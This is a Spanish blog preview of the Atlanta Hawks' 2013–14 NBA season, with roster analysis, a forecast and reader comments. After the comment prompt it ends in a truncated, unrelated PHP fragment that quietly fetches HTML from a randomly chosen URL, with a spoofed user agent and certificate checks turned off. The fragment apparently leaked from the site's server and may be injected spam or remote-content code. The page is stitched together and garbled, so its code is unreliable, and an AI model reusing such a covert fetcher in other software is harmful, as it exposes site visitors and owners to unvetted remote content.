Atlanta Hawks: El halcón vuela menos

10 de October de 2013 por Love Denise

En el último lustro los Hawks se han consolidado como el hueso duro de roer con el que los cabezas de serie del Este se tenían que enfrentar en primera ronda de Playoffs. Nunca llegaron a tener un equipo que aspirara claramente al anillo pero eran capaces de poner en aprietos, e incluso eliminar, a cualquier gallo a las primeras de cambio. En ese sentido, los Hawks han protagonizado algunas de las mejores series de los últimos años como aquella del 2008 en la que sucumbieron ante el flamante Big 3 de Boston tras 7 partidos o las de estos dos últimos años en las que vendieron muy cara su derrota ante Celtics, nuevamente, y Pacers.

Pero este año la sensación es que los halcones no van a volar tan alto como en años anteriores. No por culpa de ellos sinó porque su competencia por la comida se ha incrementado y serán bastantes las noches en las que se vayan a dormir con el sabor de la derrota y el estomago vacío. Por un lado, los gallos del Este se han reforzado bastante bien y se antoja complicado que los Hawks puedan dar la campanada eliminando a equipos como Miami, Indiana, Brooklyn, Chicago o New York. Por otra parte, la subida de nivel de equipos como Pistons, Cavs y Wizards provoca que este año los halcones vayan a tener que sudar mucho más de lo que lo han hecho en los últimos tiempos para entrar en Playoffs.

El gran halcón, el jefe de la bandada, Josh Smith, ha emigrado más al norte rumbo Detroit. Los Hawks respondieron rápidamente a este revés y consiguieron firmar a Paul Millsap por una razonable cantidad (19 millones de dólares en 2 años). Aparte de este movimiento, la columna vertebral sigue intacta y en la ciudad de la Coca-Cola continuarán un año más los Horford, Teague, Lou-Will y Korver. Este último, ha sido uno de los jugadores más beneficiados del verano ya que ha firmado un jugosísimo contrato de renovación por 6 millones anuales durante las próximas 4 temporadas que tiene toda la pinta de acabar siendo tóxico. 

Entre las muchas caras nuevas de Atlanta destaca la presencia de Elton Brand. El que antes fuese Mr 20-10 ni siquiera llega hoy día a 10-5 y tras una decepcionante campaña en los Mavs llega a Atlanta por una temporada a razón de 4 millones de dólares. Será el primer recambio interno y aportará veteranía en un equipo que también cuenta con muchos jóvenes como su principal apuesta Dennis Schroeder, elegido en el puesto 17 del último draft.

La otra cara nueva importante la encontramos en el banquillo, donde el ex-asistente de Popovych, Mike Buldenhozer, ha sido nombrado entrenador en sustitución de un Larry Drew que se marchó a Milwaukee. No ha empezado con buen pie el nuevo técnico. De hecho ha empezado tambaleándose y haciendo eses. Al parecer al buen hombre le gusta más el vino que a Falete las hamburguesas y en agosto fue arrestado tras ser detenido conduciendo bajo los efectos del alcohol.

En definitiva, sobre el papel los Hawks van a tener que ganar los partidos desde la defensa porque en ataque se trata de un equipo bastante limitado, sin grandes anotadores puros y sólo con el recurso de Jeff Teague como jugador capaz de cerrar partidos en momentos calientes.

Repasamos la plantilla con más detalle:

Bases: Jeff Teague será el halcón que guie al resto de la bandada con su dirección un tanto anárquica pero productiva. Tras sus dos primeras temporadas, la salida de jugadores importantes como Bibby, Hinrich y Jo-Jo y los buenos playoffs que cuajó en 2011 le permitieron asumir más galones y se convirtió en el líder exterior del equipo y en un base más que respetado en la NBA. El año pasado sus números fueron buenos (14,6 puntos y 7 asistencias) aunque aún debe mejorar su tiro de larga distancia. Por sus manos pasarán bastantes balones calientes que en función de su acierto y la correcta toma de decisiones, se convertirán en derrotas o victorias.

Para que el bueno de Jeff no se relaje y tenga competencia, los Hawks le han apretado las tuercas drafteando al base alemán Dennis Schroeder, uno de los pocos bases puros que se presentaban al Draft. El año pasado jugó en el modesto Braunschweig de la Liga Alemana en el que promedió un 18-7. Pero la NBA es otra dimensión y veremos como el veloz base encaja en la mejor liga del mundo. Las comparativas que hacen de él no son malas y van desde Darren Collison hasta el mismísimo Rajon Rondo aunque con bastante mejor tiro exterior.

El joven Shelvin Mack y el veterano Royal Ivey se disputarán el puesto de tercer base del equipo. El primero es un buen defensor pero sin mucha fortuna tras sus dos primeros años en la liga, aunque por edad tiene margen de mejora. El segundo, tras una decada en la NBA, no ha pasado de ser el tercer base de los muchos equipos por los que ha deambulado, por lo que a estas alturas, no se espera nada bueno de él.

Escoltas: Louis Williams es el mejor del equipo en esta posición pero intuimos que partirá desde el banco para salir como 6º hombre. La pasada temporada solo pudo disputar 39 partidos tras destrozarse el ligamento cruzado anterior en enero, lesión de la que aún anda recuperándose y que le hará no estar a tope en el primer tramo de la temporada. Sólido y solvente jugador, capaz también de actuar de playmaker, debe liderar el juego ofensivo de la segunda unidad.

El puesto de escolta titular debería ser para John Jenkins. El joven jugador de 22 años no consiguió demostrar en su año rookie la muñequita de tirador que le hizo famoso durante su paso por la Universidad de Vanderbilt pero esta temporada deberá dar un paso adelante si quiere hacerse con un nombre en la liga. Para completar el puesto aparece Jared Cunningham, llegado este verano desde Dallas tras pasarse su año rookie agitando toallas.

Aleros: El puesto de titular será para el guaperas de la NBA, Kyle Korver. No vamos a descubrir ahora que es uno de los mejores tiradores de la liga pero como hemos comentado anteriormente, nos parece excesivo el contrato que le han firmado. Por detrás de él, poca cosa aprovechable hay. DeMarre Carroll llega para aportar intensidad defensiva atrás pero nada al otro lado de la cancha y Damien Wilkins, un veterano jugador que ha protagonizado partidos más que dignos a lo largo de su carrera, llega a Atlanta con la intención de demostrar que aún tiene sitio en alguna franquicia de la liga.

Ala-Pivots: Paul Millsap será quien deba hacer olvidar a Josh Smith. Su calidad y su buena colocación en la zona hacen contrarrestar su falta de centímetros para la posición. La pasada no fue la mejor de sus temporadas pero es un jugador bastante regular y todo un seguro de vida. Sólo se ha perdido hasta el momento 14 partidos en las 7 temporadas que lleva en la liga.

Como suplente jugará Elton Brand, quien ha firmado sólo por una temporada y atendiendo al nivel mostrado en su ultima campaña en Dallas, no descartaríamos que al final de la presente campaña colgase las botas o firmase por el mínimo por algún contender para intentar “robar” un anillo.

Pivots: Al Horford es la otra estrella del equipo. Numéricamente el dominicano cuajó la mejor campaña de su carrera el año pasado tras irse a más de 17 puntos, 10 rebotes y 3 asistencias. Excepcional defensor y sobrio anotador, tras la marcha de Smith debe asumir más protagonismo y convertirse en el líder dentro y fuera de la pista. Como recambio, los Hawks han importado de Europa al primo lejano de Boozer y hermano macedonio de Luis Tosar, Pero Antic, quien a sus 31 años gozará de su primera experiencia NBA. El macedonio es un jugador atípico. Atrás aporta calidad con su intensidad y en ataque, los rudos y fórnidos brazacos con los que reparte leña en defensa, se convierten en unas suaves y frágiles manecillas con gran tacto a la hora de tirar triples, su mejor arma.

Completando la plantilla se encuentra el mexicano Gustavo Ayón quien no ha acabado de demostrar en su segundo año las buenas sensaciones que transmitió en su año rookie,pero a todos los efectos se trata de una buena adquisición tras llegar libre este verano y firmar una sola temporada a 1,5 millones.

Altas: Millsap, Schroeder, Cunningam, Antic, Ayon, , Carroll, Ivey
Bajas: Josh Smith, DeShawn Stevenson, Ivan Johnson, Devin Harris, Pachulia, Petro, Dahntay Jones

Quinteto Inicial: Teague, Jenkins, Korver, Millsap, Horford
Sexto hombre: Lou Williams

Pronóstico: Entre el 7º y el 9º luchando con Cavs y Wizards por las ultimas posiciones de PO (38-44)

Comenta

14 comentarios a esta entrada

  1. Denise dice:
    #1

    Les he dado entre el 7º y el 9º, pero si Bynum está bien y Bennett es buenecillo; y por otra parte la pareja Nene-Okafor no sufren de muchas lesiones, creo que los Hawks se quedarían fuera de PO.
    Ojito, con Schroeder que pinta bastante bien para el futuro.

      Citar

  2. Sancho88 dice:
    #2

    Creo que pueden entrar en playoffs, tienen buen equipo con mayúsculas, en el sentido de juego de equipo. Van a ser jodidos de ganar. Sin demasiadas estrellas pero muy buen conjunto. Schroedder tiene pintísima de supercrack

      Citar

  3. Esteban dice:
    #3

    sinceramente no me gusta en absoluto el equipo, nada nada

    mal o bien jojo y/o smith cargaban la ofensiva de este equipo, ahora nadie podra hacerlo, tanto teague, hardford y millsap sn buenos aprovechando los espacios generados por los demas, pero no tanto por si mismo
    menos podemos esperar de creacion de korver

    lo unico que los puede meter en PO, es lou williams jugando al nivel que lo ha hecho estos ultimos años y peleando por el 6to hombre de la temporada

    viendo su situacion salarial, no me extrañaria que si no logran mantenerse en zona de PO para el all-star, algun entusiasta no decica un trade de harford por algun pick top 5, y tiren la temporada a la basura buscando su propio pick top 10, lo que sumado a teague, shoeder, jenkis y hasta los propios williams millsap, tienen un equipo para iniciar una reconstruccion no de tan abajo

    hoy los veo un escalon detras de cleveland (dios como molan los cavs, waiters sobrepasara todas las expectativas), wizards (se desperto vasely y si vuelve okafor seran muy duros) y detriot

    estan a la altura de los raptors

      Citar

  4. Jose Luis dice:
    #4

    Cierto es que les falta un escolta o alero con más capacidad ofensiva con el balón… un tio que pueda botar y penetrar, aunque solo haga eso. Creo que han dado un pasito atrás, y o Jenkins se destapa, o sufrirán mucho para PO.

    Lo de reconstrucción como dices Esteban, pues podría ocurrir, pero creo que Horford y Millsap pueden ser un buen tándem para ir a por algo en 2015. Veremos, pero no me disgusta tu idea.

      Citar

  5. Esteban dice:
    #5

    Jose Luis:
    Cierto es que les falta un escolta o alero con más capacidad ofensiva con el balón… un tio que pueda botar y penetrar, aunque solo haga eso. Creo que han dado un pasito atrás, y o Jenkins se destapa, o sufrirán mucho para PO.

    Lo de reconstrucción como dices Esteban, pues podría ocurrir, pero creo que Horford y Millsap pueden ser un buen tándem para ir a por algo en 2015. Veremos, pero no me disgusta tu idea.

    hardford es un verdadero crack, pero como se ha visto en todos estos ultimos años no tiene el talento ofensivo como para cargar al equipo a grandes cosas,
    aun asi, algun equipo con alguna expectativa a corto plazo, puede ver en el una excelentisima segunda espada de lujo en la luga por el titulo

    si algun equipo bueno sufre una lesion dura y lo manda a loteria, puede canjear su pick por harfod

    ejemplo, los cavs sufren la lesion de irving, bynum , varejao y bennett por muchos juegos, y seran un equipo de loteria con un pick muy alto, les sirve tener otro rookie top 5? les serviria mas un hardford sumado a lo que ya tienen y no seguir coleccionando picks altos sin lograr nunca un salto de calidad

      Citar

  6. rumbero dice:
    #6

    Sólo con Horford, Millsap y Teague ganarán partidos pero en el resto de posiciones andan un poco justos. Korver las enchufa pero defendiendo a los aleros que corren por el este las pasa canutas. De hecho en la preseason Korver está jugando de SG y Carroll es el SF titular, aunque supongo que más por la lesión de Louw Will y el solar que hay en esta posición ahora mismo. A ver como les va, yo creo deben estar peleando por las últimas plazas de PO si ninguno se resfría y Williams vuelve bien. La base no es mala pero les falta igual un par de retoques para ser los Hawks de siempre y pelear por segunda ronda de PO.
    Muy buena pinta Schroeder y no nos olvidemos que anda perdido Nogueira en el Estu.

    Alguno que siga con asiduidad los Hawks ¿Mike Scott va a tener más minutos? Es que es un tio que lo poco que le he visto siempre se ha salido literalmente

      Citar

  7. Denise dice:
    #7

    rumbero:

    Alguno que siga con asiduidad los Hawks ¿Mike Scott va a tener más minutos? Es que es un tio que lo poco que le he visto siempre se ha salido literalmente

    Te comento, como sabes ahora mismo en pretemporada casi todas las plantillas tienen como 20 jugadores de los cuales 7-8 son tios sin contratos no garantizados y normalmente solo un par de ellos entran en los 15 jugadores del roster final.
    Pues bien, los Hawks ahora mismo cuentan con 20 jugadores, solo 12 con contratos garantizados, y entre los 8 que no lo tienen, se encuentra Mike Scott.
    No lo incluí en el analisis (hecho antes de los partidos de pretemporada) porque con la competencia que tiene en el PF (Millsap, Brand, incluso Antic y Ayón puede jugar de 4) veia muy dificil que se hiciese con un hueco final en la plantilla, y por tanto incluí a los 15 que finalmente pensaba que formarían el equipo.
    Pero ahora el tio, en estos 2 amistosos se ha salido y probablemente ocupe una plaza final en la plantilla en detrimento de Ivey o de Wilkins.

      Citar

  8. Denise dice:
    #8

    rumbero:
    Sólo con Horford, Millsap y Teague ganarán partidos pero en el resto de posiciones andan un poco justos. Korver las enchufa pero defendiendo a los aleros que corren por el este las pasa canutas. De hecho en la preseason Korver está jugando de SG y Carroll es el SF titular, aunque supongo que más por la lesión de Louw Will y el solar que hay en esta posición ahora mismo.

    El SG titular debe ser Jenkins, pero está lesionado con problemas de espaldas. Aunque como digo en el analisis, el escolta mas importante será Lou que lo sacaran de 6º hombre para que el equipo no se descompense ni se venga abajo tanto cuando se vayan a descansar los titulares

      Citar

  9. Esteban dice:
    #9

    poner a jenkis de titular da la pauta que no entraran a PO

    si bien parece tener un tiro de 3 puntos excelente, lo cierto es que en su año rookie no demostro casi nada, la liga de verano tampoco y hoy esta lesionado

    como se justifica que salga de titular? solo por la pobreza del plantel

    jenkis es todos los otros equipos del este con aspiraciones a PO, tendria dificultades para ser un jugador de rotacion confiable, y aqui es titular

    no me llama tanto la atencion que korver este jugando de dos, y no me llamaria la atencion de que williams termine por salir de titular, ya que es el unico jugador suficientemente talentoso para generar ofensivas por si mismo y crearse su propio tiro

      Citar

  10. Denise dice:
    #10

    Si Esteban, ya comento que los Hawks son bastante limitados en ataque. Solo tienen a Teague y a Lou-Will para jugarselas en momentos claves y generar ventajas, pero habrá que darle minutos a Jenkins para que progrese, solo tiene 22 años y era una de los mejores tiradores de la NCAA. Un poco de paciencia.
    Y sobre Lou-Will, ya sabes la manía que existe en EEUU de que los titulares te los quitan de golpe todos a la vez y meten a los 5 suplentes juntos a jugar. Como Williams no salga en la segunda unidad, le dejas toda la papeleta al rookie Schroeder para que mueva el equipo y anote.
    Yo estoy contigo, el equipo está muy justo por fuera y como dije en el primer comentario solo las lesiones ajenas les pueden meter en PO.

      Citar

  11. Josgel dice:
    #11

    Yo tampoco veo a Jenkins de titular. Creo que el cinco que está jugando en pretemporada será el inicial, basándose en una buena defensa. Para mi Korver es un jugador infravalorado; tenemos la imagen de él de blanco tirador, pero es mucho más de eso. El año pasado apareció un articulo en que se comentaba que era el segundo jugador del equipo en la estadística +/- solo detrás de Smith. Tiene buena defensa aunque no destaque en estadísticas individuales.
    En cuanto a Scott creo que jugará el papel que el año pasado desempeñaba Ivan Johnson, a ver si mejora su defensa, ya que en ataque es un jugador válido.
    Por otra parte creo que el que puede entrar en el roster es James Johnson para ayudar en el puesto de alero, ya que además fue compañero de universidad de Teague.

      Citar

  12. txusma dice:
    #12

    A mi lo que no me deja de sorprender es la confianza ciega que tenéis en los Cavs…

      Citar

  13. Sancho88 dice:
    #13

    James Johnson es un paketazo de los grandes

      Citar

  14. portu dice:
    #14

    Jenkins en su año rookie demostró en pocos minutos bastantes cosillas. Es un tirador de 3 de primer nivel, tiene un físico aceptable para la posición de 2. En absoluto sería un retroceso para los Hawks empezar con el de titular. Otra opción es q si ya tienes a Korver de 3 titular pues puedas empezar con un 2 muy físico como Cunningham. De una forma u otra, veo muy flojos a estos Hawks, no creo q tengan nivel para llegar a playoffs. Al final será una cuestión de ver quien es el menos malo de los q han pegado un gran bajón (Philly, Milwaukee, Atlanta y Boston), los q habrán mejorado un poco partiendo desde abajo (Detroit, Toronto, Washington) y los q siguen en el pozo como el año pasado (Orlando). En principio veo por delante a Detroit y Toronto, pero luego veremos cómo encajan las piezas nuevas de cada equipo.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>